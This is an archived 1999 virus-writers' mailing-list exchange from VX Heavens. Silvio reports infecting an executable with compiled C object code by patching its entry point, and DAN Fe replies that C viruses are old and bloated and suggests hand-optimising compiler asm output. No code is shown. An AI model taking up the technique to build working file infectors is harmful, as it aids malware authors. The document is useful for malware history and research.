Msg : Prev 8 / 222 Next -7 +23
1999-09-17 14:09:06

To  :

Subj:

Re: preliminary C virus results (object code in infection)


Hello! 

Well, basically, c virii have been known for years already. And I 
actually quite disagree with you that they will end asm virii. Not they, 
at least. Look around, 80% (or more) of newly written virii are macro 
ones for M$ products. Today, it's became quite irrelevant for most cases 
to write virii in c, and even in asm. Very little people use pure DOS 
boxes (when those babies come into play); you'd rather be working in Win9x 
or NT or Linux; the last one is actually the only pure c-based OS (well, 
at least for virii). 

So, c virii is not a new; moreover, even quite simple virii in C will be 
rather large; not speaking of highly sophisticated ones, which would 
apparently be several tens K, which is quite inappropriate for a virus. 

Instead, how about telling the C compiler to produce asm output, and then 
simply hand optimize it? Or even easier -- to rewrite the initial program 
loader? This can save you several vulnerable K bytes ;-) 


-- DAN Fe 

ICQ UIN 38934845 

-----BEGIN PGP PUBLIC KEY BLOCK----- 
Version: PGP 6.5.1 
mQGiBDfVOHURBADvy82iHKSp2mJf48B8ODZDVK57Ey3t7hI0+2Sgo8hvxasXj4U1 
80fsH17As3Cr//Ytylztm5zGEEj5fDBXZBZnVe4Cqrrmd2XHt69NMsnTQ8PeNtJM 
dyKqQJoMHNjZ7itBYoGzK7/W767mcYWw/wF6rxMo970MDgifKJ0ARTyZ3QCg/4ef 
45QBjhacyU4KHBVtOx7XHcsEAJRVTJWucr5YlrRc1ajE2gaSldlGXfty/Jkco1u9 
TpDhzCbv9hwDtDYsbuWs4liZlrm5acN2VExByefR0pZHNLICs2F++FDTFyyKLipE 
ItLs4r53xxfqHY2uRPtcdsZ2H6/oILdjrW8VVvNb+mhyyBeIWXPBSTTWMm4Gc5Kb 
OMb4BADgVGGPsIy9FiVNGJGGJs9l43qLzp7E/Y+K1dG1GfgASfsfP0vJw1d0FpHt 
KAFK3n3yn69sXHylCgBMkmaZ70Bzyy6KYiu8vhMjmd5kZbZAIQU7I3cFCY3awBLg 
FyilgBgP0emvXfd1Dxs2zC1Zj6rDnwyg/H3pNxhmF9unZe7Vl7QrQWxleGV5IE4u 
IERva3VjaGFldiA8ZGFuZmVAaW5ldC5zc2MubnN1LnJ1PokATgQQEQIADgUCN9U4 
dQQLAwECAhkBAAoJEOYKiVHYIXXiMY4An0QMqGCC3q0B13J70ma1XXUs7DwDAKCZ 
440C4Rf4Y9Jr7ZSzrrK7/XjB8LkBDQQ31Th/EAQAzI/1sb59kvd0cSaDEruyv2xc 
T2cWBcUh8meOLWS4l/wcvzQbCkSy8632VJ4bCZRxBJ6ejfMxFCLXubLsXya711+a 
aO5yLzR1xt34riMfMlKAusJM/r/8iU/7MxX4bYD2FPq2UevFGqY7hU6QCmRs2jfz 
IExJgai1zIU8krvZaCEAAgIEAIP4P5wKorzxdf5/8TBZxnHmtrD5ibBA7jmjBIuR 
Gk17X2YSTeUrL5TmuYk1gIdB5HrnEK5jnnXleQ2AMFxWKrF3O3swOMI5YYkhpM0X 
D0yiJMN1DsTv4xiMq1pmxCr02eh62O0hOXrCw4KNzygpBrs1UG+/sZZjwqJJEOB6 
9Pj6iQBGBBgRAgAGBQI31Th/AAoJEOYKiVHYIXXiNZcAn0spfX2hFCESDG6a7ctC 
KQ6vTUdDAJ48rm2KHuu7Kf4ert7/6tSQB1G1gw== 
=Yhg/ 
-----END PGP PUBLIC KEY BLOCK----- 
On Fri, 17 Sep 1999 [email protected] wrote: 
> OK. I've done it. I've infected a host executeable with compiled object 
> code. 
> At least I've gotten the new code to execute and leave the host code 
> untouched 
> (without running). Basically, I'm linking the object code manually and 
> inserting the code into the host binary, patching the entry point to jump to 
> main (from the parasite). I'll have to do a few hacks to get the original 
> entry point jumped too again, but I thought it worth writing on. THIS COULD 
> MEAN THE END OF PURE ASM VIRUS :) I'll post code once I've gotten everything 
> working and cleaned up (its quite hacky - except for the linker code which 
> was ripped off some previous project i wrote and was quite nice). I really 
> see big things ahead from this result. C virus could be knocked up in an 
> afternoon by beginners in pure C because there wont be a need to go to asm. 
> I'll throw in some push/pop code to make sure the registers stay clean 
> aswell 
> i suppose. 
> 
> again. to reiterate, i infected host code without using asm parasite code 
> but 
> rather parasite code purely derived from c source (object code) :) 
> 
> hopefully, next time i post, i'll have a c virus written. 
> 
> 
> Silvio 
> 
VX Heavens - collection of viruses,sources and articles.
Нажми Alt + F, чтобы перейти к форме поиска
Пользовательского поиска